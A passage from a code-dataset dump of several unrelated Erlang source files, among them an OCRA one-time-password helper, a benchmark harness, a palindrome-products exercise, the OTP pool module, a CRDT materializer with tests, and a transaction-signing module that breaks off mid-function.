p_di_ts2([X, $M]) -> p_di_ts3(p_len([X], 1, 59), 60);
p_di_ts2([X1, X2, $M]) -> p_di_ts3(p_len([X1, X2], 1, 59), 60);
p_di_ts2([X, $H]) -> p_di_ts3(p_len([X], 1, 59), 60);
p_di_ts2([X1, X2, $H]) -> p_di_ts3(p_len([X1, X2], 0, 48), 3600);
p_di_ts2(_) -> false.
p_di_ts3(false,_) -> false;
p_di_ts3(X, Y) -> X * Y.
p_len(S, Min, Max) ->
try plen1(list_to_integer(S), Min, Max) catch error:badarg -> false end.
plen1(L, Min, Max) when L >= Min, L =< Max -> L;
plen1(_,_,_) -> false.
dgst_sz(sha) -> 20;
dgst_sz(sha256) -> 32;
dgst_sz(sha512) -> 64.
dgst("SHA1") -> sha;
dgst("SHA256") -> sha256;
dgst("SHA512") -> sha512;
dgst(_) -> false.
truncate(false, Bin) -> Bin;
truncate(T, Bin) ->
Offset = binary:last(Bin) band 16#0f,
<<_:Offset/binary, Z:32, _/binary>> = Bin,
truncate1(integer_to_binary(Z band 16#7fffffff), T).
truncate1(B, T) when size(B) < T ->
list_to_binary([lists:duplicate(T - size(B), $0), B]);
truncate1(B, T) when size(B) > T -> binary:part(B, size(B) - T, T);
truncate1(B, _) -> B.
%% ensure Key consistent with size from parsed suite,
%% also handle hexadecimal keys
fmt_key(Sz, K) when is_binary(K), size(K) == Sz -> K;
fmt_key(Sz, K) when is_binary(K), Sz * 2 == size(K) ->
try hex2bin(K) catch error:badarg -> false end;
fmt_key(_, _) -> false.
%% create DataInput binary, ensure DataIput
%% consistent with parsed suite.
data(DIP, #{suite := Suite} = DataInput) ->
L = maps:to_list(maps:remove(suite, DataInput)),
data1(DIP, L, [0, Suite]).
data1([],[], Acc) -> list_to_binary(lists:reverse(Acc));
data1([V|R], L0, Acc) ->
MaybeL = lists:keytake(element(1,V), 1, L0),
fmt(MaybeL, V, R, Acc);
data1(_,_,_) -> false.
fmt(false, _, _, _) -> false;
fmt({value, {_, A}, L}, V, R, Acc) ->
fmt2(fmt1(V, A), R, L, Acc).
fmt1({c}, C) when is_integer(C), C >= 0, C < 1 bsl 64 -> <<C:64>>;
fmt1({q, $A, _}, B) when is_binary(B) ->
fmt_pad(B);
fmt1({q, $H, _}, B0) when is_binary(B0) ->
try fmt_pad(hex2bin(B0))
catch error:badarg -> false end;
fmt1({q, $N, _}, B0) when is_binary(B0) ->
try fmt_pad(dec2bin(binary_to_list(B0)))
catch error:badarg -> false end;
fmt1({p, Alg}, B) when is_binary(B) ->
dgst_sz(Alg) == size(B) andalso B;
fmt1({p, Alg}, {pin, B}) when is_binary(B) -> crypto:hash(Alg, B);
fmt1({s, SLen}, B) when is_binary(B), size(B) == SLen -> B;
fmt1({t, _}, B) when is_binary(B), size(B) == 8 -> B;
fmt1({t, V}, calc) -> fmt_ts(V);
fmt1(_,_) -> false.
fmt2(false,_,_,_) -> false;
fmt2(F, R, L, Acc) -> data1(R, L, [F | Acc]).
fmt_pad(B) -> Pad = 128 - size(B), Pad >= 0 andalso <<B/binary, 0:(Pad * 8)>>.
bin2hex(B) -> << <<Y>> || <<X:4>> <= B, Y <- integer_to_list(X, 16) >>.
hex2bin(H) ->
<< <<Z>> || <<X:8, Y:8>> <= H, Z <- [binary_to_integer(<<X, Y>>, 16)] >>.
dec2bin(I) -> dec2bin1(integer_to_list(list_to_integer(I), 16)).
dec2bin1(L) when length(L) rem 2 == 0 -> hex2bin(list_to_binary(L));
dec2bin1(L) -> hex2bin(list_to_binary([L, $0])).
fmt_ts(Step) ->
M = calendar,
Seconds = M:datetime_to_gregorian_seconds(M:universal_time()),
<<(Seconds div Step):64>>.
%% ensure VerifyParams consistent with parsed suite.
vpar(DI, #{cw := CW, tw := TW} = M)
when is_integer(CW), CW > 0, is_integer(TW), TW > 0 ->
maps:size(M) == 2
andalso lists:member({c}, DI)
andalso lists:keymember(t,1,DI)
andalso [{tw, TW}, {cw, CW}];
vpar(DI, #{cw := CW} = M) when is_integer(CW), CW > 0 ->
maps:size(M) == 1
andalso lists:member({c}, DI)
andalso (not lists:keymember(t,1,DI))
andalso [{cw, CW}];
vpar(DI, #{tw := TW} = M) when is_integer(TW), TW > 0 ->
maps:size(M) == 1
andalso lists:keymember(t,1,DI)
andalso (not lists:member({c}, DI))
andalso [{tw, TW}];
vpar(DI, #{} = M) ->
maps:size(M) == 0
andalso (not lists:member({c}, DI))
andalso (not lists:keymember(t,1,DI))
andalso [];
vpar(_,_) -> false. | src/rfc6287.erl | 0.57678 | 0.450178 | rfc6287.erl | starcoder |
-module(perftest).
%% API
-export([ start/0
, start/1
, module/1
]).
%% Metadata about arguments for a test case: a map from the name of
%% the arguments to the list of possible values to test with.
%%
%% The test case will be executed will all the possible combination of
%% the arguments.
-type test_args_meta() :: #{Arg :: atom() => Values :: nonempty_list()}.
%% A specific combination of arguments selected from a
%% `test_args_meta' structure.
-type test_args() :: #{Arg :: atom() => Value :: term()}.
%% Test case state returned from the setup function to be passed to
%% the cleanup.
-type setup_state() :: term().
%% The possible return types of a function: normal return or various
%% exceptions.
-type return_type() :: normal | throw | error | exit.
-export_type([ test_args_meta/0
, test_args/0
, setup_state/0
, return_type/0
]).
%% ---------------------------------------------------------------------
%% Behaviour callbacks
%% ---------------------------------------------------------------------
%% Provide metadata about arguments for the test case.
-callback args() -> test_args_meta().
%% Prepare for executing the test case with the given arguments. The
%% function shall return the list of arguments to pass to the actual
%% test case and the state to pass to the `cleanup' function after
%% executing the test.
-callback setup(test_args()) -> {ok, list(), setup_state()}.
%% Validate the return value from a test case.
-callback validate(return_type(), term(), setup_state()) -> boolean().
%% Clean up after running a test case.
-callback cleanup(setup_state()) -> term().
%% ---------------------------------------------------------------------
%% API
%% ---------------------------------------------------------------------
%% @doc Execute all test modules found in the same directory with this
%% module.
-spec start() -> ok.
start() ->
start(find_mods("*_test")).
%% @doc Execute a specific list of test modules.
-spec start([module()]) -> ok.
start(Mods) ->
lists:foreach(fun module/1, Mods).
%% @doc Execute a single test module.
-spec module(module()) -> ok.
module(Mod) ->
Args = Mod:args(),
ArgsList = maps:to_list(Args),
ImplMods = find_mods(impl_pattern(Mod)) -- [Mod],
[test(Mod, ImplMod, GeneratedArgs)
|| GeneratedArgs <- generate_args(ArgsList),
ImplMod <- ImplMods
],
ok.
%% ---------------------------------------------------------------------
%% Internal helper functions
%% ---------------------------------------------------------------------
%% @doc Find modules in the same directory as this one that match the
%% given pattern.
-spec find_mods(string()) -> [module()].
find_mods(Pattern) ->
Dir = filename:dirname(code:which(?MODULE)),
Ext = code:objfile_extension(),
[list_to_atom(filename:basename(File, Ext))
|| File <- filelib:wildcard(Pattern ++ Ext, Dir)
].
%% @doc Get the module name pattern for implementation of a test case
%% module. A test case module must have a name like `X_test', and the
%% corresponding implementations will have to match the `X_*' pattern.
-spec impl_pattern(module() | string()) -> string().
impl_pattern(Mod) when is_atom(Mod) ->
impl_pattern(atom_to_list(Mod));
impl_pattern("_test") ->
"_*";
impl_pattern([C | Cs]) ->
[C | impl_pattern(Cs)].
%% @doc Generate all combination of arguments from argument meta-data.
-spec generate_args([{K, [V]}]) -> [#{K => V}].
generate_args([]) ->
[#{}];
generate_args([{Arg, Values} | Args]) ->
[maps:put(Arg, Value, GeneratedArgs)
|| Value <- Values,
GeneratedArgs <- generate_args(Args)
].
test(Mod, ImplMod, Args) ->
{module, ImplMod} = code:ensure_loaded(ImplMod),
erlang:system_flag(schedulers_online, 1),
timer:sleep(100),
erlang:system_flag(schedulers_online, erlang:system_info(schedulers)),
process_flag(scheduler, 1),
N = 1000,
Warmup = 100,
Times = lists:sort(
lists:nthtail(
Warmup,
test_loop(Mod, ImplMod, Args, N + Warmup))),
Median = lists:nth(N div 2, Times),
Mean = lists:sum(Times) / N,
Dev = math:sqrt(
lists:sum([(Time - Mean) * (Time - Mean) || Time <- Times])
/ (N - 1)),
io:format("median: ~7b ns mean: ~10.3f +- ~10.3f ns [~w] ~w~n",
[Median, Mean, Dev, ImplMod, Args]),
process_flag(scheduler, 0),
ok.
test_loop(Mod, ImplMod, Args, N) when N > 0 ->
S = self(),
P = spawn_link(fun () -> S ! {self(), test_proc(Mod, ImplMod, Args)} end),
receive {P, Time} ->
[Time | test_loop(Mod, ImplMod, Args, N - 1)]
end;
test_loop(_, _, _, 0) ->
[].
test_proc(Mod, ImplMod, Args) ->
process_flag(scheduler, erlang:system_info(schedulers)),
process_flag(priority, max),
{ok, FunArgs, State} = Mod:setup(Args),
erlang:yield(),
T1 = os:perf_counter(),
{Type, Value, T2} =
try apply(ImplMod, run, FunArgs) of
V ->
PC = os:perf_counter(),
{normal, V, PC}
catch
T:V ->
PC = os:perf_counter(),
{T, V, PC}
end,
true = Mod:validate(Type, Value, State),
Mod:cleanup(State),
erlang:convert_time_unit(T2 - T1, perf_counter, nanosecond). | test/perftest.erl | 0.645567 | 0.64058 | perftest.erl | starcoder |
-module(palindrome_products).
-export([smallest/2, largest/2, test_version/0]).
%% API
-spec smallest(integer(), integer()) -> {integer(), [{integer(), integer()}]} | {error, atom()}.
smallest(Min, Max) when Min > Max ->
{error, invalid_range};
smallest(Min, Max) ->
Factors = lists:seq(Min, Max),
palindromes(Factors, Factors, fun erlang:'<'/2, undefined).
-spec largest(integer(), integer()) -> {integer(), [{integer(), integer()}]} | {error, atom()}.
largest(Min, Max) when Min > Max ->
{error, invalid_range};
largest(Min, Max) ->
Factors = lists:seq(Max, Min, -1),
palindromes(Factors, Factors, fun erlang:'>'/2, undefined).
-spec test_version() -> integer().
test_version() ->
1.
%% Internal
palindromes([], _F2, _Condition, Best) ->
Best;
palindromes([_ | F1Tail], [], Condition, Best) ->
palindromes(F1Tail, F1Tail, Condition, Best);
palindromes([F1Head | _] = F1, [F2Head | F2Tail], Condition, Best) ->
EvenBetter = case is_best(Condition, F1Head * F2Head, Best) of
true ->
{F1Head * F2Head, [{F1Head, F2Head}]};
equal ->
{Product, Factors} = Best,
{Product, [{F1Head, F2Head} | Factors]};
false ->
Best
end,
palindromes(F1, F2Tail, Condition, EvenBetter).
% Order matters for performance here, since we've got quite a few
% possibilities to check. As is_palindrome is the most expensive of
% our checks, attempt to delay that until we're sure it's necessary.
is_best(_Condition, Product, undefined) ->
is_palindrome(Product);
is_best(_Condition, Product, {Product, _Factors}) ->
equal;
is_best(Condition, Product, {Best, _Factors}) ->
Condition(Product, Best) andalso is_palindrome(Product).
is_palindrome(Product) ->
% This turns out to be the expensive part of the inner loop.
% Conversion to binary is a bit faster than conversion to a list,
% and in combination with an early exit on the first and last
% digit check nets a 3x speedup on my machine.
BinString = integer_to_binary(Product),
case binary:first(BinString) == binary:last(BinString) of
true ->
String = binary:bin_to_list(BinString),
String == lists:reverse(String);
false ->
false
end. | erlang/palindrome-products/src/palindrome_products.erl | 0.524151 | 0.507934 | palindrome_products.erl | starcoder |
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 1996-2018. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
-module(pool).
%% Supplies a computational pool of processors.
%% The chief user interface function here is get_node()
%% Which returns the name of the nodes in the pool
%% with the least load !!!!
%% This function is callable from any node including the master
%% That is part of the pool
%% nodes are scheduled on a per usage basis and per load basis,
%% Whenever we use a node, we put at the end of the queue, and whenever
%% a node report a change in load, we insert it accordingly
% User interface Exports ...
-export([start/1,
start/2,
stop/0,
get_nodes/0,
get_nodes_and_load/0,
get_node/0,
pspawn/3,
attach/1,
pspawn_link/3]).
%% Internal Exports
-export([statistic_collector/0,
do_spawn/4,
init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2]).
%% User interface
%% Start up using the .hosts.erlang file
-spec start(Name) -> Nodes when
Name :: atom(),
Nodes :: [node()].
start(Name) ->
start(Name,[]).
-spec start(Name, Args) -> Nodes when
Name :: atom(),
Args :: string(),
Nodes :: [node()].
start(Name, Args) when is_atom(Name) ->
_ = gen_server:start({global, pool_master}, pool, [], []),
Hosts = net_adm:host_file(),
Nodes = start_nodes(Hosts, Name, Args),
lists:foreach(fun attach/1, Nodes),
Nodes.
%%
%% Interface functions ...
%%
-spec get_nodes() -> [node()].
get_nodes() ->
get_elements(2, get_nodes_and_load()).
-spec attach(Node) -> 'already_attached' | 'attached' when
Node :: node().
attach(Node) ->
gen_server:call({global, pool_master}, {attach, Node}).
get_nodes_and_load() ->
gen_server:call({global, pool_master}, get_nodes).
-spec get_node() -> node().
get_node() ->
gen_server:call({global, pool_master}, get_node).
-spec pspawn(Mod, Fun, Args) -> pid() when
Mod :: module(),
Fun :: atom(),
Args :: [term()].
pspawn(M, F, A) ->
gen_server:call({global, pool_master}, {spawn, group_leader(), M, F, A}).
-spec pspawn_link(Mod, Fun, Args) -> pid() when
Mod :: module(),
Fun :: atom(),
Args :: [term()].
pspawn_link(M, F, A) ->
P = pspawn(M, F, A),
link(P),
P.
start_nodes([], _, _) -> [];
start_nodes([Host|Tail], Name, Args) ->
case slave:start(Host, Name, Args) of
{error, {already_running, Node}} ->
io:format("Can't start node on host ~w due to ~w~n",[Host, {already_running, Node}]),
[Node | start_nodes(Tail, Name, Args)];
{error, R} ->
io:format("Can't start node on host ~w due to ~w~n",[Host, R]),
start_nodes(Tail, Name, Args);
{ok, Node} ->
[Node | start_nodes(Tail, Name, Args)]
end.
-spec stop() -> 'stopped'.
stop() ->
gen_server:call({global, pool_master}, stop).
get_elements(_Pos,[]) -> [];
get_elements(Pos,[E|T]) -> [element(Pos,E) | get_elements(Pos,T)].
stop_em([]) -> stopped;
stop_em([N|Tail]) ->
rpc:cast(N, erlang, halt, []),
stop_em(Tail).
init([]) ->
process_flag(trap_exit, true),
spawn_link(pool, statistic_collector, []),
{ok,[{0,node()}]}.
handle_call(get_nodes, _From, Nodes)->
{reply, Nodes, Nodes};
handle_call(get_node, _From, [{Load,N}|Tail]) ->
{reply, N, Tail++[{Load+1, N}]};
handle_call({attach, Node}, _From, Nodes) ->
case lists:keymember(Node, 2, Nodes) of
true ->
{reply, already_attached, Nodes};
false ->
erlang:monitor_node(Node, true),
spawn_link(Node, pool, statistic_collector, []),
{reply, attached, Nodes++[{999999,Node}]}
end;
handle_call({spawn, Gl, M, F, A}, _From, Nodes) ->
[{Load,N}|Tail] = Nodes,
Pid = spawn(N, pool, do_spawn, [Gl, M, F, A]),
{reply, Pid, Tail++[{Load+1, N}]};
handle_call(stop, _From, Nodes) ->
%% clean up in terminate/2
{stop, normal, stopped, Nodes}.
handle_cast(_, Nodes) ->
{noreply, Nodes}.
handle_info({Node,load,Load}, Nodes) ->
Nodes2 = insert_node({Load,Node}, Nodes),
{noreply, Nodes2};
handle_info({nodedown, Node}, Nodes) ->
{noreply, lists:keydelete(Node, 2, Nodes)};
handle_info(_, Nodes) -> %% The EXIT signals etc.etc
{noreply, Nodes}.
terminate(_Reason, Nodes) ->
N = lists:delete(node(), get_elements(2, Nodes)),
stop_em(N),
ok.
-spec do_spawn(pid(), module(), atom(), [term()]) -> term().
do_spawn(Gl, M, F, A) ->
group_leader(Gl, self()),
apply(M, F, A).
insert_node({Load,Node},[{L,Node}|Tail]) when Load > L ->
%% We have a raised load here
pure_insert({Load,Node},Tail);
insert_node({Load,Node},[{L,N}|Tail]) when Load =< L ->
%% Move forward in the list
T = lists:keydelete(Node,2,[{L,N}|Tail]),
[{Load,Node} | T];
insert_node(Ln,[H|T]) ->
[H | insert_node(Ln,T)];
insert_node(X,[]) -> % Can't happen
error_logger:error_msg("Pool_master: Bad node list X=~w\n", [X]),
exit(crash).
pure_insert({Load,Node},[]) ->
[{Load,Node}];
pure_insert({Load,Node},[{L,N}|Tail]) when Load < L ->
[{Load,Node}, {L,N} | Tail];
pure_insert(L,[H|T]) -> [H|pure_insert(L,T)].
%% Really should not measure the contributions from
%% the background processes here .... which we do :-(
%% We don't have to monitor the master, since we're slaves anyway
statistic_collector() ->
statistic_collector(5).
statistic_collector(0) -> exit(normal);
statistic_collector(I) ->
sleep(300),
case global:whereis_name(pool_master) of
undefined ->
statistic_collector(I-1);
M ->
stat_loop(M, 999999)
end.
%% Do not tell the master about our load if it has not changed
stat_loop(M, Old) ->
sleep(2000),
case statistics(run_queue) of
Old ->
stat_loop(M, Old);
NewLoad ->
M ! {node(), load, NewLoad}, %% async
stat_loop(M, NewLoad)
end.
sleep(I) -> receive after I -> ok end. | lib/stdlib/src/pool.erl | 0.569374 | 0.418756 | pool.erl | starcoder |
%% -------------------------------------------------------------------
%%
%% Copyright <2013-2018> <
%% Technische Universität Kaiserslautern, Germany
%% Université Pierre et Marie Curie / Sorbonne-Université, France
%% Universidade NOVA de Lisboa, Portugal
%% Université catholique de Louvain (UCL), Belgique
%% INESC TEC, Portugal
%% >
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either expressed or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% List of the contributors to the development of Antidote: see AUTHORS file.
%% Description and complete License: see LICENSE file.
%% -------------------------------------------------------------------
%% @doc Responsible for generating the object versions requested by clients.
-module(materializer).
-include("antidote.hrl").
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-export([
create_snapshot/1,
update_snapshot/3,
materialize_eager/3,
check_operations/1,
check_operation/1,
belongs_to_snapshot_op/3
]).
%% @doc Creates an empty CRDT
-spec create_snapshot(type()) -> snapshot().
create_snapshot(Type) ->
antidote_crdt:new(Type).
%% @doc Applies an downstream effect to a snapshot of a crdt.
%% This function yields an error if the crdt does not have a corresponding update operation.
-spec update_snapshot(type(), snapshot(), effect()) -> {ok, snapshot()} | {error, reason()}.
update_snapshot(Type, Snapshot, Op) ->
try
antidote_crdt:update(Type, Op, Snapshot)
catch
_:_ ->
{error, {unexpected_operation, Op, Type}}
end.
%% @doc Applies updates in given order without any checks, errors are simply propagated.
-spec materialize_eager(type(), snapshot(), [effect()]) ->
snapshot() | {error, {unexpected_operation, effect(), type()}}.
materialize_eager(_Type, Snapshot, []) ->
Snapshot;
materialize_eager(Type, Snapshot, [Effect | Rest]) ->
case update_snapshot(Type, Snapshot, Effect) of
{error, Reason} ->
{error, Reason};
{ok, Result} ->
materialize_eager(Type, Result, Rest)
end.
%% @doc Check that in a list of client operations, all of them are correctly typed.
-spec check_operations([client_op()]) -> ok | {error, {type_check_failed, client_op()}}.
check_operations([]) ->
ok;
check_operations([Op | Rest]) ->
case check_operation(Op) of
true ->
check_operations(Rest);
false ->
{error, {type_check_failed, Op}}
end.
%% @doc Check that an operation is correctly typed.
-spec check_operation(client_op()) -> boolean().
check_operation(Op) ->
case Op of
{update, {_, Type, Update}} ->
antidote_crdt:is_type(Type) andalso
antidote_crdt:is_operation(Type, Update);
{read, {_, Type}} ->
antidote_crdt:is_type(Type);
_ ->
false
end.
%% Should be called doesn't belong in SS
%% returns true if op is more recent than SS (i.e. is not in the ss)
%% returns false otw
-spec belongs_to_snapshot_op(snapshot_time() | ignore, dc_and_commit_time(), snapshot_time()) ->
boolean().
belongs_to_snapshot_op(ignore, {_OpDc, _OpCommitTime}, _OpSs) ->
true;
belongs_to_snapshot_op(SSTime, {OpDc, OpCommitTime}, OpSs) ->
OpSs1 = vectorclock:set(OpDc, OpCommitTime, OpSs),
not vectorclock:le(OpSs1, SSTime).
-ifdef(TEST).
%% Testing update with pn_counter.
update_pncounter_test() ->
Type = antidote_crdt_counter_pn,
Counter = create_snapshot(Type),
?assertEqual(0, Type:value(Counter)),
Op = 1,
{ok, Counter2} = update_snapshot(Type, Counter, Op),
?assertEqual(1, Type:value(Counter2)).
%% Testing pn_counter with update log
materializer_counter_withlog_test() ->
Type = antidote_crdt_counter_pn,
Counter = create_snapshot(Type),
?assertEqual(0, Type:value(Counter)),
Ops = [
1,
1,
2,
3
],
Counter2 = materialize_eager(Type, Counter, Ops),
?assertEqual(7, Type:value(Counter2)).
%% Testing counter with empty update log
materializer_counter_emptylog_test() ->
Type = antidote_crdt_counter_pn,
Counter = create_snapshot(Type),
?assertEqual(0, Type:value(Counter)),
Ops = [],
Counter2 = materialize_eager(Type, Counter, Ops),
?assertEqual(0, Type:value(Counter2)).
%% Testing non-existing crdt
materializer_error_nocreate_test() ->
?assertException(error, {badmatch, false}, create_snapshot(bla)).
%% Testing crdt with invalid update operation
materializer_error_invalidupdate_test() ->
Type = antidote_crdt_counter_pn,
Counter = create_snapshot(Type),
?assertEqual(0, Type:value(Counter)),
Ops = [{non_existing_op_type, {non_existing_op, actor1}}],
?assertEqual(
{error,
{unexpected_operation, {non_existing_op_type, {non_existing_op, actor1}},
antidote_crdt_counter_pn}},
materialize_eager(Type, Counter, Ops)
).
%% Testing that the function check_operations works properly
check_operations_test() ->
Operations =
[
{read, {key1, antidote_crdt_counter_pn}},
{update, {key1, antidote_crdt_counter_pn, increment}}
],
?assertEqual(ok, check_operations(Operations)),
Operations2 = [
{read, {key1, antidote_crdt_counter_pn}},
{update, {key1, antidote_crdt_counter_pn, {{add, elem}, a}}},
{update, {key2, antidote_crdt_counter_pn, {increment, a}}},
{read, {key1, antidote_crdt_counter_pn}}
],
?assertMatch({error, _}, check_operations(Operations2)).
%% Testing belongs_to_snapshot returns true when a commit time
%% is smaller than a snapshot time
belongs_to_snapshot_test() ->
CommitTime1a = 1,
CommitTime2a = 1,
CommitTime1b = 1,
CommitTime2b = 7,
SnapshotClockDC1 = 5,
SnapshotClockDC2 = 5,
CommitTime3a = 5,
CommitTime4a = 5,
CommitTime3b = 10,
CommitTime4b = 10,
SnapshotVC = vectorclock:from_list([{1, SnapshotClockDC1}, {2, SnapshotClockDC2}]),
?assertEqual(
true,
belongs_to_snapshot_op(
vectorclock:from_list([{1, CommitTime1a}, {2, CommitTime1b}]),
{1, SnapshotClockDC1},
SnapshotVC
)
),
?assertEqual(
true,
belongs_to_snapshot_op(
vectorclock:from_list([{1, CommitTime2a}, {2, CommitTime2b}]),
{2, SnapshotClockDC2},
SnapshotVC
)
),
?assertEqual(
false,
belongs_to_snapshot_op(
vectorclock:from_list([{1, CommitTime3a}, {2, CommitTime3b}]),
{1, SnapshotClockDC1},
SnapshotVC
)
),
?assertEqual(
false,
belongs_to_snapshot_op(
vectorclock:from_list([{1, CommitTime4a}, {2, CommitTime4b}]),
{2, SnapshotClockDC2},
SnapshotVC
)
).
-endif. | apps/antidote/src/materializer.erl | 0.544559 | 0.45944 | materializer.erl | starcoder |
%% @doc Implements a data structure for cryptographically signed transactions.
%% This is the envelope around transactions to make them cryptographically safe.
%% The transactions normally also have keys of the "signers" in the transaction,
%% which are extracted using the signers/1 function in the respective transaction
%% handler.
%%
%% The purpose of this module is to provide an API for cryptograpically signed
%% transactions and hide all implementation details. Therefore, the record
%% #signed_tx{} should be kept private and considered an abstract type.
%%
%% A transaction can be signed by one or several signers. Each transaction can
%% determine its own signers by the transaction callback 'signers'. Since we do not
%% want to depend upon transaction types in this module, the user of
%% {@module} should first obtain the signers of the transaction and then call this
%% {@link sign/2} with these signers. There is a {@link sign/3} function that can sign
%% with respect to a certain block height. This is handy whenever the governance
%% variables on what crypto to use would change.
-module(dsdtx_sign).
%% API
-export([sign/2,
hash/1,
add_signatures/2,
tx/1,
verify/2,
signatures/1]).
%% API that should be avoided to be used
-export([serialize_for_client/3,
serialize_for_client_pending/2,
meta_data_from_client_serialized/2,
serialize_to_binary/1,
deserialize_from_binary/1]).
-export_type([signed_tx/0,
binary_signed_tx/0]).
-include_lib("apps/dsdcore/include/blocks.hrl").
-include_lib("apps/dsdcore/include/dsdc_crypto.hrl").
-record(signed_tx, {
tx :: dsdtx:tx(),
signatures = ordsets:new() :: ordsets:ordset(binary())}).
-opaque signed_tx() :: #signed_tx{}.
-type binary_signed_tx() :: binary().
-define(VALID_PUBK(K), byte_size(K) =:= 32).
-define(VALID_PRIVK(K), byte_size(K) =:= 64).
%% @doc Given a transaction Tx, a private key or list of keys,
%% return the cryptographically signed transaction using the default crypto
%% parameters.
-spec sign(dsdtx:tx(), list(binary()) | binary()) -> signed_tx().
sign(Tx, PrivKey) when is_binary(PrivKey) ->
sign(Tx, [PrivKey]);
sign(Tx, PrivKeys) when is_list(PrivKeys) ->
Bin = dsdtx:serialize_to_binary(Tx),
case lists:filter(fun(PrivKey) -> not (?VALID_PRIVK(PrivKey)) end, PrivKeys) of
[_|_]=BrokenKeys -> erlang:error({invalid_priv_key, BrokenKeys});
[] -> pass
end,
Signatures = [ enacl:sign_detached(Bin, PrivKey)
|| PrivKey <- PrivKeys],
#signed_tx{tx = Tx, signatures = lists:sort(Signatures)}.
-spec hash(signed_tx()) -> binary().
hash(#signed_tx{} = Tx) ->
dsdc_hash:hash(signed_tx, serialize_to_binary(Tx)).
-spec add_signatures(signed_tx(), list(binary())) -> signed_tx().
add_signatures(#signed_tx{signatures = OldSigs} = Tx, NewSigs)
when is_list(NewSigs) ->
Tx#signed_tx{signatures = lists:usort(NewSigs ++ OldSigs)}.
-spec tx(signed_tx()) -> dsdtx:tx().
%% @doc Get the original transaction from a signed transaction.
%% Note that no verification is performed, it just returns the transaction.
%% We have no type yest for any transaction, and spend_tx()
%% seems restricted as type.
tx(#signed_tx{tx = Tx}) ->
Tx.
%% @doc Get the signatures of a signed transaction.
-spec signatures(signed_tx()) -> list(binary()).
signatures(#signed_tx{signatures = Sigs}) ->
Sigs.
-spec verify(signed_tx(), dsdc_trees:trees()) -> ok | {error, signature_check_failed}.
verify(#signed_tx{tx = Tx, signatures = Sigs}, Trees) ->
Bin = dsdtx:serialize_to_binary(Tx),
case dsdtx:signers(Tx, Trees) of
{ok, Signers} ->
verify_signatures(Signers, Bin, Sigs);
{error, _Reason} ->
{error, signature_check_failed}
end.
verify_signatures([PubKey|Left], Bin, Sigs) ->
case verify_one_pubkey(Sigs, PubKey, Bin) of
{ok, SigsLeft} -> verify_signatures(Left, Bin, SigsLeft);
error -> {error, signature_check_failed}
end;
verify_signatures([],_Bin, []) ->
ok;
verify_signatures(PubKeys,_Bin, Sigs) ->
lager:debug("Signature check failed: ~p ~p", [PubKeys, Sigs]),
{error, signature_check_failed}.
verify_one_pubkey(Sigs, PubKey, Bin) ->
verify_one_pubkey(Sigs, PubKey, Bin, []).
verify_one_pubkey([Sig|Left], PubKey, Bin, Acc) when ?VALID_PUBK(PubKey) ->
case enacl:sign_verify_detached(Sig, Bin, PubKey) of
{ok, _} -> {ok, Acc ++ Left};
{error, _} -> verify_one_pubkey(Left, PubKey, Bin, [Sig|Acc])
end;
verify_one_pubkey([], _PubKey,_Bin,_Acc) -> % no more signatures
error;
verify_one_pubkey(_, _PubKey,_Bin,_Acc) -> % invalid pubkey
error.
-define(SIG_TX_TYPE, signed_tx).
-define(SIG_TX_VSN, 1).
%% deterministic canonical serialization.
-spec serialize_to_binary(signed_tx()) -> binary_signed_tx().
serialize_to_binary(#signed_tx{tx = Tx, signatures = Sigs}) ->
%% TODO: The original binary should be kept
%% around since that is what was signed
dsdc_object_serialization:serialize(
?SIG_TX_TYPE,
?SIG_TX_VSN,
serialization_template(?SIG_TX_VSN),
[ {signatures, lists:sort(Sigs)}
, {transaction, dsdtx:serialize_to_binary(Tx)}
]).
-spec deserialize_from_binary(binary()) -> signed_tx().
deserialize_from_binary(SignedTxBin) when is_binary(SignedTxBin) ->
[ {signatures, Sigs}
, {transaction, TxBin}
] = dsdc_object_serialization:deserialize(
?SIG_TX_TYPE,
?SIG_TX_VSN,
serialization_template(?SIG_TX_VSN),
SignedTxBin),
#signed_tx{ tx = dsdtx:deserialize_from_binary(TxBin)
, signatures = Sigs
}.
serialization_template(?SIG_TX_VSN) ->
[ {signatures, [binary]}
, {transaction, binary}
].
-spec serialize_for_client(json|message_pack, #header{}, dsdtx_sign:signed_tx()) ->
binary() | map().
serialize_for_client(Encoding, Header, #signed_tx{}=S) ->
{ok, BlockHash} = dsdc_headers:hash_header(Header),
serialize_for_client(Encoding, S, dsdc_headers:height(Header), BlockHash,
hash(S)).
-spec serialize_for_client_pending(json|message_pack, dsdtx_sign:signed_tx()) ->
binary() | map().
serialize_for_client_pending(Encoding, #signed_tx{}=S) ->
serialize_for_client(Encoding, S, -1, <<>>, hash(S)).
serialize_for_client(message_pack, #signed_tx{}=S, BlockHeight, BlockHash0,
TxHash) ->
BlockHash = case BlockHash0 of
<<>> -> <<"none">>;
_ -> dsdc_base58c:encode(block_hash, BlockHash0)
end,
MetaData = [#{<<"block_height">> => BlockHeight},
#{<<"block_hash">> => BlockHash},
#{<<"hash">> => dsdc_base58c:encode(tx_hash, TxHash)}],
TxBin = serialize_to_binary(S),
Payload = [?SIG_TX_TYPE,
?SIG_TX_VSN,
#{<<"tx">> => dsdc_base58c:encode(transaction, TxBin)},
MetaData
],
dsdc_base58c:encode(transaction, msgpack:pack(Payload));
serialize_for_client(json, #signed_tx{tx = Tx, signatures = Sigs},
BlockHeight, BlockHash0, TxHash) ->
BlockHash = case BlockHash0 of
<<>> -> <<"none">>;
_ -> dsdc_base58c:encode(block_hash, BlockHash0)
end,
#{<<"tx">> => dsdtx:serialize_for_client(Tx),
<<"block_height">> => BlockHeight,
